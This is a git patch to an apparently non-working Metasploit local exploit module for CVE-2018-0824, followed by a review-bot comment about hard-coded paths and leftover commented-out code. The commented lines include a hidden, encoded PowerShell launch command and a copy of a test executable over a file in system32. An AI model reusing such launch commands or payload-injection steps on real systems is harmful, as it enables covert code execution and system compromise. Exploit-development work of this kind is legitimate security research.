From eeec3c115e762efec49faf19297252951b05c485 Mon Sep 17 00:00:00 2001
From: bwatters-r7
Date: Fri, 19 Oct 2018 16:12:47 -0500
Subject: [PATCH] This is as far as I can take it for an exploit module but it still does not work. Commiting for posterity.
---
 modules/exploits/windows/local/unmarshal.rb | 15 +++++++++------
 1 file changed, 9 insertions(+), 6 deletions(-)
diff --git a/modules/exploits/windows/local/unmarshal.rb b/modules/exploits/windows/local/unmarshal.rb
index 3aff817681..71bbfa7171 100644
--- a/modules/exploits/windows/local/unmarshal.rb
+++ b/modules/exploits/windows/local/unmarshal.rb
@@ -131,14 +131,17 @@ class MetasploitModule < Msf::Exploit::Local
 vprint_status("Creating the sct file with payload #{payload_path}")
 local_script_template_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'script_template')
 script_template_data = ::IO.read(local_script_template_path)
- temp_path = payload_path
- print_status("Payload path: #{temp_path}")
- temp_path.gsub!('\\', '\\\\\\\\')
- print_status("Payload path: #{temp_path}")
 vprint_status("script_template_data.length = #{script_template_data.length}")
- command = 'cmd.exe /c rundll32.exe ' + payload_path.gsub("\\", "\\\\\\\\") + ',0'
-# script_data = script_template_data.sub!('SCRIPTED_COMMAND', command)
+# command = '%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e 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'
+# command = 'cmd.exe /c \\\"C:\\\\\\\\Program files\WindowsPowerShell\\\\\\\\Modules\\\\\\\\Pester\\\\\\\\3.4.0\\\\\\\\bin\\\\\\\\Pester.bat\\\" /help \\\"$null; c:\\\\\\\\Users\\\\\\\\msfuser\\\\\\\\downloads\\\\\\\\test.exe'
+# command = 'C:\Users\msfuser\Downloads\test.bat'
+# command.gsub!('\\', '\\\\\\\\')
+ command = 'C:\users\msfuser\downloads\test.exe'
+# command = 'copy /Y C:\\users\\msfuser\\downloads\\test.exe C:\\windows\\system32\\notepad.exe.bak'
+# command.gsub!('\\', '\\\\\\\\\\\\')
 script_data = script_template_data.sub!('SCRIPTED_COMMAND', command)
+# script_data = script_template_data.sub!('SCRIPTED_COMMAND', 'C:\\\\\\\\windows\\\\\\\\system32\\\\\\\\test.exe')
+# script_data = script_template_data.sub!('SCRIPTED_COMMAND', 'C:\\\\\\\\Users\\\\\\\\msfuser\\\\\\\\Downloads\\\\\\\\putty.exe')
 if script_data == nil
 fail_with(Failure::BadConfig, "Failed to substitute command in script_template")
 end
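Review bot: The only live change, `command = 'C:\users\msfuser\downloads\test.exe'`, hard-codes a path from the author's test machine in place of anything derived from `payload_path`, so the path logged by the first context line (`vprint_status("Creating the sct file with payload #{payload_path}")`) no longer describes what is written into the template. The seven surrounding `+#` lines are commented-out experiments with differing backslash escaping rather than documentation and should not land as-is; if the branch is meant as a work-in-progress record, replace them with one comment stating what is unresolved, e.g. `# TODO: escaping of SCRIPTED_COMMAND for script_template is not settled (see commit message)`. The enclosing method starts and ends outside the hunk.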